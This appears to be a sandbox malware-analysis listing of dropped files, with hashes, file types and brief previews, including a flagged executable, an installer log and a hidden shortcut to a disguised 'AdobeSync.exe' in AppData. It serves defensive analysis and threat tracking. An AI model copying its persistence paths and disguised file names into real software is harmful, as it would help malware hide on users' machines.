                                                                                                                                                                                                                                                                                                SHA-512:0BA10190CF85028824C7B6DA8CEE42E7793A813219ED1E827B8A6E513DB643F0DA9D6E40EFB5EB5C1062AAE8F028476ECF0FB9C8A9B7234B219FCEF4F7C945AA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2684
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.9131436698960678
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:uiTrlKx68Wa7x4jxl9Il8uQVa0E9FVUV8tLtTQ4Mk03rNuOSJPd/vc:aqHYGa08NVQ4Mk+uTJK
                                                                                                                                                                                                                                                                                                MD5:5BABD5D3BC7B1BAD51137A25DAFDFEA3
                                                                                                                                                                                                                                                                                                SHA1:CC762703A46A93E65F8A94767AA478F3F42E1B2B
                                                                                                                                                                                                                                                                                                SHA-256:04E34A7A54C3462CEF9E4BC1A01B834ACB78E0E445C260ED192CF0AD2C510D4D
                                                                                                                                                                                                                                                                                                SHA-512:43FED513410AAA7DE71B5B8281C5762B88DEE4751F0A03994F2E7815B84751B71C3B2276E372AC2C45FDAD011DEDF61C4C008C6A9524D95E96882116F262B3B0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1600231
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.991787532372992
                                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                                SSDEEP:24576:QEhySsxs1bpGHEcp5bEuqYhzXXn86KW0Y2IDQNFnw+oLl4CSkGpyu0GAZYUWX6Jf:VyS0s1bpGkIJ/lrs6Kxtml4CShmYG3N
                                                                                                                                                                                                                                                                                                MD5:2567A1C96C23C3D657B49075BD262760
                                                                                                                                                                                                                                                                                                SHA1:2F898C0B38C3F91714862C023D96DEB73452A1E2
                                                                                                                                                                                                                                                                                                SHA-256:FAFDED8BF7C48286CB77810AF32F6A3E3C7129EC03233D615AA71B49342ED135
                                                                                                                                                                                                                                                                                                SHA-512:271224BD182CA473BD757816CB060834B39CE50A582C9EF78C154BBE3FFACDC7431BCA2F60B37CEAA2BC3F6B6E47116E563005A846BE969A4D628274C8A1F2B5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                Size (bytes):5661033
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.709040130458965
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:98304:1dqC7d1fsL0RPFRBzmjudA/chYltXevSj3DVqft9Q5iEBtbrNp4ID+GUFz4lB4rA:1dqC7jfhPFRhmjudA/chYltXevSj3DVl
                                                                                                                                                                                                                                                                                                MD5:668FB66C21BD32CF34AD0D5A3F366C2F
                                                                                                                                                                                                                                                                                                SHA1:F262893069FAF4B5603C98DDBBAA6C10B20940BE
                                                                                                                                                                                                                                                                                                SHA-256:182151677AEDC2FF2AFB4D3DE51C03BE85048838237DBA485E2203B45C6C5D64
                                                                                                                                                                                                                                                                                                SHA-512:E8C7454EDB6D825041BDC9A3791530FFFA08DB182BD811F70F76017D76286A0DD38F4B208EBF22BDF6ACA251FC90AD479B510216AB3037C98D9037940715A563
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                Size (bytes):5661033
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.709040086111673
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:98304:qdqC7d1fsL0RPFRBzmjudA/chYltXevSj3DVqft9Q5iEBtbrNp4ID+GUFz4lB4rA:qdqC7jfhPFRhmjudA/chYltXevSj3DVl
                                                                                                                                                                                                                                                                                                MD5:22AD46A96601227B66E14C32ECF7B55A
                                                                                                                                                                                                                                                                                                SHA1:A24F0EC406F4CDF130473D8A901A47453A4A9586
                                                                                                                                                                                                                                                                                                SHA-256:A5BA88AB81D6B011E343B7453356288DF7BE38E17BA8AAE6C9855D2624DEB02C
                                                                                                                                                                                                                                                                                                SHA-512:9AEB3292F3F2ED90EF4B3D8E8A094C5EAC96583E553B02749C2034404F6444A82557300153E9DEB09CE67B582EF8280FF95F505ED19F348B26F3BB9836C21981
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):154477
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                                MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                                SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                                SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                                SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):206855
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.983996634657522
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEI5:l81Lel7E6lEMVo/S01fDpWmEgD
                                                                                                                                                                                                                                                                                                MD5:788DF0376CE061534448AA17288FEA95
                                                                                                                                                                                                                                                                                                SHA1:C3B9285574587B3D1950EE4A8D64145E93842AEB
                                                                                                                                                                                                                                                                                                SHA-256:B7FB1D3C27E04785757E013EC1AC4B1551D862ACD86F6888217AB82E642882A5
                                                                                                                                                                                                                                                                                                SHA-512:3AA9C1AA00060753422650BBFE58EEEA308DA018605A6C5287788C3E2909BE876367F83B541E1D05FE33F284741250706339010571D2E2D153A5C5A107D35001
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                Size (bytes):2364728
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.606009669324617
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:49152:lbCT2kOGRpfJMi3kLRQrjYgeeZyTDwMHfDYZNBi:TkOKMiY0BZMHfDYZNBi
                                                                                                                                                                                                                                                                                                MD5:967F4470627F823F4D7981E511C9824F
                                                                                                                                                                                                                                                                                                SHA1:416501B096DF80DDC49F4144C3832CF2CADB9CB2
                                                                                                                                                                                                                                                                                                SHA-256:B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91
                                                                                                                                                                                                                                                                                                SHA-512:8883EAD428C9D4B415046DE9F8398AA1F65AE81FE7945A840C822620E18F6F9930CCE2E10ACFF3B5DA8B9C817ADE3DABC1DE576CBD255087267F77341900A41C
                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                                                                                                • Filename: w3245.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: w3245.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: 9mauyKC3JW.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: ATLEQQXO.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: ATLEQQXO.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: upgrade.hta, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: MiJZ3z4t5K.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: UolJwovI8c.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: ONHQNHFT.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                • Filename: es.hta, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                Size (bytes):987
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.4459178721419805
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:p3bAIeLLzzgu33mvcP2ctvcP2D2cP2LZv4Eq2cP2d2cP2W:prxY0didiaROZveRCR1
                                                                                                                                                                                                                                                                                                MD5:ED5E6C19D832A3A99D486F82DAFBA4FD
                                                                                                                                                                                                                                                                                                SHA1:BE25D4291F40A5F3D7A657E2546856FC536CA15D
                                                                                                                                                                                                                                                                                                SHA-256:EAB28456C0BB5C1B13EE5B8D1DE950F73F7B0BACAECB3FAE16A732CC63BFD0C2
                                                                                                                                                                                                                                                                                                SHA-512:B2147F196E2EA5E0FCD0CB61EC7EB1E9B82E4B4328B5ACBE474F527D2C2CE86332AEAFFB1CCA78AAA8AB9375B126A43753716D4CE05BA4F331B185C6C5922EBE
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[03C8:03F0][2025-01-07T07:18:11]i001: Burn v3.11.1.2318, Windows v10.0 (Build 19045: Service Pack 0), path: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe..[03C8:03F0][2025-01-07T07:18:11]i009: Command Line: '-burn.clean.room=C:\Users\user\Desktop\LVkAi4PBv6.exe -burn.filehandle.attached=528 -burn.filehandle.self=552'..[03C8:03F0][2025-01-07T07:18:11]i000: Setting string variable 'WixBundleOriginalSource' to value 'C:\Users\user\Desktop\LVkAi4PBv6.exe'..[03C8:03F0][2025-01-07T07:18:11]i000: Setting string variable 'WixBundleOriginalSourceFolder' to value 'C:\Users\user\Desktop\'..[03C8:03F0][2025-01-07T07:18:12]i000: Setting string variable 'WixBundleLog' to value 'C:\Users\user~1\AppData\Local\Temp\Scabbard_20250107071812.log'..[03C8:03F0][2025-01-07T07:18:12]i000: Setting string variable 'WixBundleName' to value 'Scabbard'..[03C8:03F0][2025-01-07T07:18:12]i000: Setting string variable 'WixBundleManufacturer' to value 'Ravine'..
                                                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Jan 7 11:18:14 2025, mtime=Tue Jan 7 11:18:14 2025, atime=Fri Jan 3 12:50:46 2025, length=1219488, window=hide
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):973
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.994254868767846
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:83+ozB2h9Q+V4zHAeYRqmgqQAuOoUgHAeY/RMJdMJtm:8vV2hSDLAeqqYnuOEAedJCJt
                                                                                                                                                                                                                                                                                                MD5:48A673BDA47312C9CA54E82D49445D67
                                                                                                                                                                                                                                                                                                SHA1:63A53CC29D0E06C6209D6514E63C10E91308E350
                                                                                                                                                                                                                                                                                                SHA-256:7454B9C5D52EA83C40E83D86F58C5D69F39D989009FD11353CF33232457D40C6
                                                                                                                                                                                                                                                                                                SHA-512:2BD21CF2759A31FF23A70180343227BBBAC7D45C0DF9F68175F78DAE128976A4BC76F83573493BDE1FDBD9D374261E6F2FC9A45653AA759C05509B790730FA52
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:L..................F.... ...{..9.`.....9.`.....}.]............................:..DG..Yr?.D..U..k0.&...&......Qg.*_......3.`...D.@.`......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.='ZEb..........................3*N.A.p.p.D.a.t.a...B.V.1.....'ZHb..Roaming.@......EW.='ZHb..........................W.-.R.o.a.m.i.n.g.....f.1.....'ZHb..PATCHR~1..N......'ZHb'ZHb..........................I...P.a.t.c.h.R.e.a.d.e.r.W.C.F.....h.2.....#ZWn .ADOBES~1.EXE..L......'ZHb'ZHb..............................A.d.o.b.e.S.y.n.c...e.x.e.......n...............-.......m...........m..k.....C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe..B.....\.....\.....\.....\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.P.a.t.c.h.R.e.a.d.e.r.W.C.F.\.A.d.o.b.e.S.y.n.c...e.x.e.`.......X.......172892...........hT..CrF.f4... ..../Tc...,......hT..CrF.f4... ..../Tc...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                Size (bytes):2564608
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.715211244010203
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:49152:JHp7RN0VYNfwgYt2uEHdFcX+oZFQ/IYAXHCo8Fq9VZO3tvZSLLtZ2mhVDKFKRwCL:LwQJc7XHb3742p
                                                                                                                                                                                                                                                                                                MD5:2B37DF2D59558C43AB3A09B85A42C9D5
                                                                                                                                                                                                                                                                                                SHA1:7595E1B746FDD08F8F39906EF39DE1B249046D67
                                                                                                                                                                                                                                                                                                SHA-256:E4D978C57CE320AF357A320024F8B75D0D677501DF1BE715623FAF4DDA061CDE
                                                                                                                                                                                                                                                                                                SHA-512:CAE560D8FA95224A6E5311E53AB030B4ED627115F324D2EC74DDFB2C195B9B9D47E00091195610BFB8441F365CC6AF7C93400F80F2E5BE14B0FBCA8A8120A3B3
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1420
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.407180793263023
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:YK0bl5r75riCe0qW+5Ua02EHP5IKL0jZ5JwbX/B+L05Mc5Sgr0RWx5M:YK0bl5r75riN0qW+5Ua02sP5IKL0jZ5F
                                                                                                                                                                                                                                                                                                MD5:19EF4DD995CDD3D46BB1B29A97FE18F6
                                                                                                                                                                                                                                                                                                SHA1:B6F9AD0649E26B889A0D94FC4E8B80D5ED9953AB
                                                                                                                                                                                                                                                                                                SHA-256:D4CF58130CA2BCAE34D34AD0EE8DB71C8C4CD01D2ED83061EC20120888505354
                                                                                                                                                                                                                                                                                                SHA-512:8EFD2AE94BCB5ED0855290A6B94A3B9F2962E932C1744DA28D8F3ACA139CF6307EC13BC3E57DCCF98EE42CDB72AB2067DC6430C3298B70A5E1435055D8EDBDBE
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"logTime": "1005/074019", "correlationVector":"Jzai6BfByv5amZ45/NBe5r","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/074027", "correlationVector":"eO8FwRQNRwFtIUhPNa0yBN","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/074027", "correlationVector":"DFCC0B139A2547CAA3433B33892C7FE6","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075031", "correlationVector":"bWXPYvVSVVANvrGBV6dHxn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075032", "correlationVector":"4CD8E3A1D096444AAB77DA6A690C4356","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075123", "correlationVector":"t3DmiSvoNTibe+/mLDIMfl","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075124", "correlationVector":"B2B504519464422FA5C6E610072CF270","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075313", "correlationVector":"/q9eTq3f/ZawbQrLDVWKju","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075314", "correlationVector":"138D0C7D
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):11185
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 135363
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):76326
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.9961120748813075
                                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                                SSDEEP:1536:hS5Vvm808scZeEzFrSpzBUl4MZIGM/iysAGz8vBBrYunau6wp:GdS8scZNzFrMa4M+lKqeu/nr
                                                                                                                                                                                                                                                                                                MD5:01E352D35675990A139199DD86B38AAC
                                                                                                                                                                                                                                                                                                SHA1:E16163C81E5F36B3B819AA0A63BFA63D88548A91
                                                                                                                                                                                                                                                                                                SHA-256:148CDE42D38C62C1A1E8B8D3D4BD8830F0F8C2DC684E3C59B0A510E31011CA4A
                                                                                                                                                                                                                                                                                                SHA-512:75A58FFAD6E3E0546268CC863AE382B5429795D8BCED64BAE2D06BCEEB6C2E37BD656A3E335EB61B521888B76913F2D0281F8C9C081FF8637307AE5934D98C8B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2564608
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.715211244010203
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:49152:JHp7RN0VYNfwgYt2uEHdFcX+oZFQ/IYAXHCo8Fq9VZO3tvZSLLtZ2mhVDKFKRwCL:LwQJc7XHb3742p
                                                                                                                                                                                                                                                                                                MD5:2B37DF2D59558C43AB3A09B85A42C9D5
                                                                                                                                                                                                                                                                                                SHA1:7595E1B746FDD08F8F39906EF39DE1B249046D67
                                                                                                                                                                                                                                                                                                SHA-256:E4D978C57CE320AF357A320024F8B75D0D677501DF1BE715623FAF4DDA061CDE
                                                                                                                                                                                                                                                                                                SHA-512:CAE560D8FA95224A6E5311E53AB030B4ED627115F324D2EC74DDFB2C195B9B9D47E00091195610BFB8441F365CC6AF7C93400F80F2E5BE14B0FBCA8A8120A3B3
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....C.b.................(!...'.....W..........@..............................1.......'...`... ..............................................01......`1.8....P&..t...........p1..............................C&.(...................p11..............................text....'!......(!.................`..`.data........@!......,!.............@....rdata..p9...."..:....!.............@..@.pdata...t...P&..v...0&.............@..@.xdata..hW....&..X....&.............@..@.bss.........0'..........................idata.......01.......&.............@....CRT....0....@1.......'.............@....tls.........P1.......'.............@....rsrc...8....`1.......'.............@..@.reloc.......p1.......'.............@..Bubpux.... ....1.......'.............@...................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1753
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                                MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                                SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                                SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                                SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "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",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):9815
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                                MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                                SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                                SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                                SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):10388
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                                MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                                SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                                SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                                SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                                Malicious:false
